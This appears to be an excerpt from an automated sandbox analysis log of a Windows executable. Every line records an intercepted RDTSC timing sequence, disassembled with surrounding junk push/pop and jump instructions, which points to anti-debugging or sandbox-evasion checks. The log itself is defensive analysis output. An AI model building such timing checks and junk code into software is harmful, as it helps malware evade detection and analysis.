                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ED3A second address: 67ED3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ED3E second address: 67ED4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F5AF second address: 67F5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FB7D second address: 67FB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC740h 0x00000009 jmp 00007FCBA46BC73Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680115 second address: 68011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68011B second address: 680128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680128 second address: 68012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68012C second address: 68013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBA46BC736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684243 second address: 684249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 684249 second address: 684293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 jmp 00007FCBA46BC747h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f je 00007FCBA46BC748h 0x00000015 jmp 00007FCBA46BC742h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68386C second address: 68388C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68388C second address: 68389B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnc 00007FCBA46BC736h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683E1A second address: 683E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683E20 second address: 683E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683F65 second address: 683F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683F75 second address: 683F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F441 second address: 68F44E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F44E second address: 68F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F453 second address: 68F45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FCBA4817E76h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F45F second address: 68F463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8A8 second address: 68F8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA4817E76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8B2 second address: 68F8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F8BC second address: 68F8CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FA30 second address: 68FA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FA34 second address: 68FA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FA38 second address: 68FA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FA3E second address: 68FA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68FCD4 second address: 68FCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6900E9 second address: 6900F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FCBA4817E76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69110C second address: 691112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691112 second address: 691116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F018 second address: 68F02E instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FCBA46BC736h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68F02E second address: 68F048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B3 second address: 6938B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6938B9 second address: 6938BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A9A6 second address: 69A9E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC746h 0x00000008 push edi 0x00000009 jmp 00007FCBA46BC742h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A9E4 second address: 69A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCBA4817E76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9BD2 second address: 5D9BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FCBA46BC73Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FCBA46BC742h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A3BB second address: 69A3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E7Bh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FCBA4817E76h 0x00000015 jmp 00007FCBA4817E85h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A3EB second address: 69A410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBA46BC745h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A410 second address: 69A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A73EB second address: 6A73FB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC742h 0x00000008 jp 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7012 second address: 6A701C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBA4817E76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A701C second address: 6A7020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A713A second address: 6A714A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FCBA4817E76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A714A second address: 6A714E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A714E second address: 6A7152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7152 second address: 6A716D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC73Bh 0x0000000f jnl 00007FCBA46BC736h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AA569 second address: 6AA58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 js 00007FCBA4817E92h 0x0000000e push edi 0x0000000f jmp 00007FCBA4817E84h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B79D4 second address: 6B79FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA46BC736h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FCBA46BC749h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C7359 second address: 6C737B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jng 00007FCBA4817E76h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C737B second address: 6C7389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5DA0 second address: 6C5DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C61E3 second address: 6C61FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007FCBA46BC741h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C61FD second address: 6C6216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBA4817E81h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6375 second address: 6C6389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC73Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6389 second address: 6C63A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E7Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C63A3 second address: 6C63B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FCBA46BC736h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C63B0 second address: 6C63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCBA4817E76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C63BC second address: 6C63C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C63C0 second address: 6C63C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6534 second address: 6C6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6539 second address: 6C653F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C653F second address: 6C6545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6684 second address: 6C669C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jl 00007FCBA4817E76h 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BAA second address: 6C8BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BB0 second address: 6C8BB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC05C second address: 6CC061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC1A7 second address: 6CC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBA4817E76h 0x0000000a jnc 00007FCBA4817E76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D70BD second address: 6D70C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D70C9 second address: 6D70DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCBA4817E76h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA6B5 second address: 6DA6D9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC740h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FCBA46BC73Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D80D3 second address: 5D80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D80D9 second address: 5D80E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnp 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D43C4 second address: 6D43FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E9Fh 0x00000008 jmp 00007FCBA4817E81h 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6623 second address: 6E6627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE5D3 second address: 6EE5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE5D7 second address: 6EE604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC747h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FCBA46BC736h 0x00000015 jns 00007FCBA46BC736h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED35D second address: 6ED363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED363 second address: 6ED39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007FCBA46BC736h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007FCBA46BC736h 0x00000019 popad 0x0000001a jnl 00007FCBA46BC74Fh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED66D second address: 6ED683 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FCBA4817E76h 0x00000010 jns 00007FCBA4817E76h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED812 second address: 6ED82B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC73Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED82B second address: 6ED840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBA4817E76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d je 00007FCBA4817E7Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ED9E2 second address: 6EDA0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC743h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC740h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDA0D second address: 6EDA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD0D second address: 6EDD3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC747h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC73Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD3A second address: 6EDD54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E84h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE2F3 second address: 6EE338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FCBA46BC73Ch 0x0000000b jmp 00007FCBA46BC746h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push ecx 0x0000001c jmp 00007FCBA46BC741h 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE338 second address: 6EE33E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE33E second address: 6EE344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE344 second address: 6EE348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F16D9 second address: 6F16DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F16DD second address: 6F16FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FCBA4817E76h 0x00000009 jmp 00007FCBA4817E7Eh 0x0000000e jg 00007FCBA4817E76h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F16FE second address: 6F1704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3F65 second address: 6F3F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
